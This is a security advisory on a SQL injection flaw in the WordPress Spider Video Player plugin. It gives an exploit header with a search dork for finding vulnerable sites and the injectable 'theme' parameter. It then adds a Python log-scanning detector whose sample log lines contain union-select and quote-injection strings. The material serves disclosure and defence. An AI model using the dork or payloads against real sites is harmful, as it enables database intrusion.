Release date:
Updated on: 2013-04-12
Affected Systems:
WordPress Spider Video Player <2.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59021
Spider Video Player is a video player plugin for WordPress.
Spider Video Player 2.1 contains a SQL injection vulnerability. Attackers can exploit it to perform unauthorized database operations.
<* Source: Ashiyane Digital Security Team
Link: http://packetstormsecurity.com/files/121250/WordPress-Spider-Video-Player-2.1-SQL-Injection.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
##############
# Exploit Title: Wordpress Spider Video Player plugin SQL Injection
#
# Exploit Author: Ashiyane Digital Security Team
#
# Plugin Link: http://web-dorado.com/
#
# Home: www.ashiyane.org
#
# Security Risk: High
#
# Version: 2.1
#
# Dork: inurl: wp-content/plugins/player/settings. php? Playlist =
#
# Tested on: Linux
#
##############
# Location: site/wp-content/plugins/player/settings.php?Playlist=[num]&theme=[SQL]
#
#
# DEm0:
#
##############
# Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
Currently, the vendor does not provide a patch or upgrade. We recommend that users of the software watch the vendor's homepage to obtain the latest version:
http://wordpress.org/extend/plugins/player/
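
Until a fixed version is installed, web server access logs can be checked for requests to the plugin's `settings.php` whose parameters are not plain numbers. The following is an added example, not part of the original advisory or the plugin's code. It assumes combined-format access logs, that legitimate playlist and theme values are plain integers, and that parameter names should be matched case-insensitively; the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

VULN_PATH = "/wp-content/plugins/player/settings.php"  # path from the advisory
WATCHED = {"playlist", "theme"}                        # parameters from the advisory
INT_RE = re.compile(r"\d+")  # assumption: legitimate values are plain integers
# Client address, request target and status from a combined-format log line.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')


def suspicious_params(target):
    """Return {param: decoded value} for watched params that are not integers."""
    parts = urlsplit(target)
    # Case-insensitive suffix match also covers WordPress in a subdirectory.
    if not parts.path.lower().endswith(VULN_PATH):
        return {}
    bad = {}
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding.
        decoded = unquote_plus(value).strip()
        if name.lower() in WATCHED and not INT_RE.fullmatch(decoded):
            bad[name.lower()] = decoded
    return bad


def scan(lines):
    """Return (client, status, bad_params) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if m:
            bad = suspicious_params(m.group(2))
            if bad:
                hits.append((m.group(1), int(m.group(3)), bad))
    return hits


SAMPLE_LOG = [  # constructed lines using documentation-range addresses
    '192.0.2.10 - - [12/Apr/2013:10:00:01 +0000] "GET /wp-content/plugins/player/settings.php?playlist=2&theme=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Apr/2013:10:00:07 +0000] "GET /wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1 HTTP/1.1" 200 498',
    '203.0.113.5 - - [12/Apr/2013:10:00:09 +0000] "GET /blog/WP-Content/plugins/player/settings.php?Playlist=1%2527&theme=3 HTTP/1.1" 200 20',
    '192.0.2.44 - - [12/Apr/2013:10:01:00 +0000] "GET /index.php?theme=dark HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so parameters sent in a POST body are not covered by this check. A flagged request that returned status 200 is a reason to review the site's database accounts and rotate WordPress credentials.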